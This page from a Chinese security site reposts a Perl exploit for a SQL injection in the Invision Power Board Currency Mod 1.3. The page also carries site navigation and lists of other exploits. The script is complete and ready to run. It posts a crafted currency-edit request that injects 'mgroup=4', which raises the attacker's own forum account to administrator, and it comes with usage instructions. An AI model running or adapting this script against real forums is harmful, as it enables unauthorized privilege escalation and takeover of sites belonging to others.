首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Invision Power Board Currency Mod(edit) SQL Injection Vulnerbility
来源:vfocus.net 作者:Pr0T3cT10n 发布时间:2010-03-15  
==================================================================
Invision Power Board Currency Mod(edit) SQL Injection Vulnerbility 
==================================================================

# Exploit Title: Invision Power Board Currency Mod(edit) SQL injection
# Date: 17/04/2007
# Author: Pr0T3cT10n
# Software Link: www.invisionpower.com<http://www.invisionpower.com>
# Version: 1.3
# Tested on: 1.3
# CVE:
# Code:
#!/usr/bin/perl
#########################################################################
# Invision Power Board Currency Mod(edit) SQL injection. #
# Bug found by Pr0T3cT10n #
# The exploit is updating your user to an admin account #
# **YOU SHOULD HAVE CURRENCY EDIT ACCESS!** #
#########################################################################
use IO::Socket;
use Digest::MD5 qw(md5_hex);
 
$host = $ARGV[0];
$path = $ARGV[1];
$id = $ARGV[2];
$passwd = $ARGV[3];
 
if(!$ARGV[3])
{
print "#################################################\n";
print "## IPB Currency Mod SQL injection Exploit. ##\n";
print "## Discoverd By Pr0T3cT10n. ##\n";
print "#################################################\n";
print "$0 [host] [path] [your id] [your passowrd]\n";
print "$0 host.com /forum 567 123456\n";
print "#################################################\n";
exit();
}
print "[~] Connecting $host:80...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp" ,
PeerAddr => $host ,
PeerPort => "80") or die("[-] Connection faild.\n");
print "[+] Connected.\n[~] Sending POST information...\n";
$pack.= "POST " . $path . "/index.php?act=modcp&CODE=docurrencyedit&memberid=" . $id . " HTTP/1.1\r\n";
$pack.= "Host: " . $host . "\r\n";
$pack.= "User-Agent: No_Agent\r\n";
$pack.= "Accept: */*\r\n";
$pack.= "Cookie: member_id=" .$id. "; pass_hash=" .md5_hex($passwd). "\r\n";
$pack.= "Keep-Alive: 300\r\n";
$pack.= "Connection: keep-alive\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: 24\r\n\r\n";
$pack.= "currency=1%20%2Cmgroup=4"; #UPDATE ibf_members SET currency=1 ,mgroup=4 WHERE id='$id'
 
print $socket $pack;
 
while($res = <$socket>)
{
if($res =~ /<table align='center' cellpadding="4" class="tablefill">/)
{
print("[+] succeed.\n");
exit();
}
}
print("[-] Faild.\n");
exit();


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·My CD Ripper Mp3 Player 1.2 (.
·win32/xp pro sp3 (calc) 57 byt
·Apple Safari history search <=
·FreeBSD and OpenBSD 'ftpd' NUL
·Trouble Ticket Express <= 3.01
·Media Player classic StatsRead
·Adobe PDF LibTiff integer over
·Yahoo Player v1.0 (.m3u) Buffe
·Mackeitone Media Player (.m3u
·Multiple PHP Functions - Local
·MicroWorld eScan Antivirus < 3
·Skype - URI Handler Input Vali
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved